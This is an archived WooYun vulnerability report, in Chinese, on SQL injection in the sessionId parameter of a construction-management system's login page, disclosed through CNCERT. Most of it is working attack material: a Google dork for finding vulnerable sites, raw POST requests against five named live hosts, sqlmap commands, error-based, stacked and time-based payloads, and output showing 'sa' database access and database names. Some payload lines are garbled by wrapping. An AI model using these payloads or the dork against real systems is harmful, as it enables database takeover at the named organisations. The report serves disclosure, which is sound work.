漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-075693
漏洞标题:某建设集团综合管理信息系统通用注入
相关厂商:cncert国家互联网应急中心
漏洞作者: Mr.leo
提交时间:2014-09-16 10:29
修复时间:2014-12-15 10:30
公开时间:2014-12-15 10:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-16: 细节已通知厂商并且等待厂商处理中
2014-09-21: 厂商已经确认,细节仅向厂商公开
2014-09-24: 细节向第三方安全合作伙伴开放
2014-11-15: 细节向核心白帽子及相关领域专家公开
2014-11-25: 细节向普通白帽子公开
2014-12-05: 细节向实习白帽子公开
2014-12-15: 细节向公众公开
简要描述:
BOOM!!
详细说明:
http://wooyun.org/bugs/wooyun-2010-064440
前人经验,Username存在注入
经过检测,sessionId参数也存在注入,post参数中存在sessionId大部分都存在问题
北京清科锐华软件有限公司开发的一套施工管理系统
谷歌搜索 intitle:综合管理信息系统-登录
漏洞证明:
5个案例证明下:
1、
POST /login.asp HTTP/1.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:
:8000/login.asp
Cookie: ASPSESSIONIDCQQDDBDC=DOCFAOBDCBOEDPFKGJIIKJHK
Host: 121.28.24.70:8000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
captchaCode=94102&opflag=submit&Password=g00dPa%24%24w0rD&sessionId=836785129&Submit=%b5%c7%c2%bc&Username=jjcfcvkg
[root@Hacker~]# Sqlmap -r d:\post2.txt -p "sessionId" --dbs --current-user --current-db
Place: POST
Parameter: sessionId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: captchaCode=94102&opflag=submit&Password=g00dPa$$w0rD&sessionId=836
785129' AND 3011=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(100)+CHAR(108)+CHAR(58)+(S
ELECT (CASE WHEN (3011=3011) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112
)+CHAR(120)+CHAR(114)+CHAR(58))) AND 'NhuS'='NhuS&Submit=???&Username=jjcfcvkg
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: captchaCode=94102&opflag=submit&Password=g00dPa$$w0rD&sessionId=836
785129'; WAITFOR DELAY '0:0:5';--&Submit=???&Username=jjcfcvkg
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: captchaCode=94102&opflag=submit&Password=g00dPa$$w0rD&sessionId=836
785129' WAITFOR DELAY '0:0:5'--&Submit=???&Username=jjcfcvkg
---
[16:34:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[16:34:31] [INFO] fetching current user
[16:34:36] [INFO] retrieved: sa
current user: 'sa'
[16:34:36] [INFO] fetching current database
[16:34:40] [INFO] retrieved: hbjg
current database: 'hbjg'
[16:34:40] [INFO] fetching database names
[16:34:45] [INFO] the SQL query used returns 6 entries
[16:34:50] [INFO] retrieved: hbjg
[16:34:56] [INFO] retrieved: master
[16:35:00] [INFO] retrieved: model
[16:35:05] [INFO] retrieved: msdb
[16:35:10] [INFO] retrieved: NewHBJG
[16:35:15] [INFO] retrieved: tempdb
2、
POST
9090/login.asp? HTTP/1.1
Host: pm.cr20g.com:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
9090/login.asp
Cookie: ASPSESSIONIDAADASARA=KFIDJFAALEFKFDLGGACDKAAK; RecordName=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
opflag=submit&sessionId=5847130&Username=1&Password=2&captchaCode=1923
[root@Hacker~]# Sqlmap -r d:\post3.txt -p "sessionId" --dbs --current-user --current-db
Place: POST
Parameter: sessionId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: opflag=submit&sessionId=5847130' AND 7668=CONVERT(INT,(CHAR(58)+CHA
R(112)+CHAR(101)+CHAR(110)+CHAR(58)+(SELECT (CASE WHEN (7668=7668) THEN CHAR(49)
ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(109)+CHAR(121)+CHAR(58))) AND 'mtjw
'='mtjw&Username=1&Password=2&captchaCode=1923
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: opflag=submit&sessionId=5847130'; WAITFOR DELAY '0:0:5';--&Username
=1&Password=2&captchaCode=1923
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: opflag=submit&sessionId=5847130' WAITFOR DELAY '0:0:5'--&Username=1
&Password=2&captchaCode=1923
---
[16:49:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:49:20] [INFO] fetching current user
[16:49:25] [INFO] retrieved: sa
current user: 'sa'
[16:49:25] [INFO] fetching current database
[16:49:29] [INFO] retrieved: cr20g_test
current database: 'cr20g_test'
[16:49:29] [INFO] fetching database names
[16:49:34] [INFO] the SQL query used returns 7 entries
[16:49:40] [INFO] retrieved: cr20g
[16:49:46] [INFO] retrieved: cr20g_exam
[16:49:53] [INFO] retrieved: cr20g_test
[16:50:00] [INFO] retrieved: master
[16:50:06] [INFO] retrieved: model
[16:50:13] [INFO] retrieved: msdb
[16:50:20] [INFO] retrieved: tempdb
3、
POST
:9000/login.asp? HTTP/1.1
Host: 171.12.11.108:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
:9000/login.asp
Cookie: ASPSESSIONIDQADSDRCT=MNJLLLNDJBEFGJJMEONLJJKF
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
opflag=submit&sessionId=1035713161&userName=1&password=2&captchaCode=9216
Place: POST
Parameter: sessionId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: opflag=submit&sessionId=1035713161' AND 9402=CONVERT(INT,(CHAR(58)
CHAR(97)+CHAR(115)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (9402=9402) THEN CHAR(
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(119)+CHAR(102)+CHAR(58))) AND 'rV
E'='rVEE&userName=1&password=2&captchaCode=9216
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: opflag=submit&sessionId=1035713161'; WAITFOR DELAY '0:0:5';--&user
ame=1&password=2&captchaCode=9216
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: opflag=submit&sessionId=1035713161' WAITFOR DELAY '0:0:5'--&userNa
e=1&password=2&captchaCode=9216
---
[16:54:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:54:05] [INFO] fetching current user
[16:54:10] [INFO] retrieved: sa
current user: 'sa'
[16:54:10] [INFO] fetching current database
[16:54:15] [INFO] retrieved: zzgl
current database: 'zzgl'
[16:54:15] [INFO] fetching database names
[16:54:19] [INFO] the SQL query used returns 7 entries
[16:54:24] [INFO] retrieved: master
[16:54:29] [INFO] retrieved: model
[16:54:33] [INFO] retrieved: msdb
[16:54:38] [INFO] retrieved: ReportServer
[16:54:42] [INFO] retrieved: ReportServerTempDB
[16:54:47] [INFO] retrieved: tempdb
[16:54:52] [INFO] retrieved: zzgl
4、
POST
:8080/login.asp? HTTP/1.1
Host: www.changxinluqiao.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
.com:8080/login.asp
Cookie: currentUserID=; ASPSESSIONIDSQCDAQDR=BPNHKGMDAMDLPLJMJEDACAJF
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
opflag=submit&sessionId=1013612093&userName=1&password=2&captchaCode=1256
Place: POST
Parameter: sessionId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: opflag=submit&sessionId=1013612093' AND 5342=CONVERT(INT,(CHAR(58)+
CHAR(118)+CHAR(112)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5342=5342) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(58))) AND 'Idm
n'='Idmn&userName=1&password=2&captchaCode=1256
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: opflag=submit&sessionId=1013612093'; WAITFOR DELAY '0:0:5';--&userN
ame=1&password=2&captchaCode=1256
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: opflag=submit&sessionId=1013612093' WAITFOR DELAY '0:0:5'--&userNam
e=1&password=2&captchaCode=1256
---
[16:58:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:58:17] [INFO] fetching current user
[16:58:21] [INFO] retrieved: sa
current user: 'sa'
[16:58:21] [INFO] fetching current database
[16:58:26] [INFO] retrieved: cxlq
current database: 'cxlq'
[16:58:26] [INFO] fetching database names
[16:58:30] [INFO] the SQL query used returns 8 entries
[16:58:35] [INFO] retrieved: cxlq
[16:58:40] [INFO] retrieved: CXLQ_1120
[16:58:44] [INFO] retrieved: master
[16:58:49] [INFO] retrieved: model
[16:58:53] [INFO] retrieved: msdb
[16:58:58] [INFO] retrieved: ReportServer
[16:59:03] [INFO] retrieved: ReportServerTempDB
[16:59:07] [INFO] retrieved: tempdb
5、
POST
8060/login.asp? HTTP/1.1
Host: pm.htlq.com.cn:8060
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
:8060/login.asp
Cookie: ASPSESSIONIDCSAACCCR=POKDKDMDMIFCPOMJJDCEEDOJ
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
opflag=submit&sessionId=1010449321&userName=12&password=2&captchaCode=0483
Place: POST
Parameter: sessionId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: opflag=submit&sessionId=1010449321' AND 2464=CONVERT(INT,(CHAR(58)+
CHAR(97)+CHAR(121)+CHAR(115)+CHAR(58)+(SELECT (CASE WHEN (2464=2464) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(118)+CHAR(120)+CHAR(58))) AND 'VC
Cw'='VCCw&userName=12&password=2&captchaCode=0483
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: opflag=submit&sessionId=1010449321'; WAITFOR DELAY '0:0:5';--&userN
ame=12&password=2&captchaCode=0483
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: opflag=submit&sessionId=1010449321' WAITFOR DELAY '0:0:5'--&userNam
e=12&password=2&captchaCode=0483
---
[16:58:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:58:07] [INFO] fetching current user
[16:58:07] [INFO] retrieved: sa
current user: 'sa'
[16:58:07] [INFO] fetching current database
[16:58:07] [INFO] retrieved: HTLQ
current database: 'HTLQ'
[16:58:07] [INFO] fetching database names
[16:58:07] [INFO] the SQL query used returns 12 entries
[16:58:08] [INFO] retrieved: BAK
[16:58:08] [INFO] retrieved: HTLQ
[16:58:08] [INFO] retrieved: HTLQ_OT
[16:58:08] [INFO] retrieved: HTLQ_ST
[16:58:08] [INFO] retrieved: HTLQ_WY
[16:58:09] [INFO] retrieved: master
[16:58:09] [INFO] retrieved: model
[16:58:09] [INFO] retrieved: msdb
[16:58:09] [INFO] retrieved: ReportServer
[16:58:09] [INFO] retrieved: ReportServerTempDB
[16:58:10] [INFO] retrieved: SMS
[16:58:10] [INFO] retrieved: tempdb
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:17
确认时间:2014-09-21 10:00
厂商回复:
最新状态:
暂无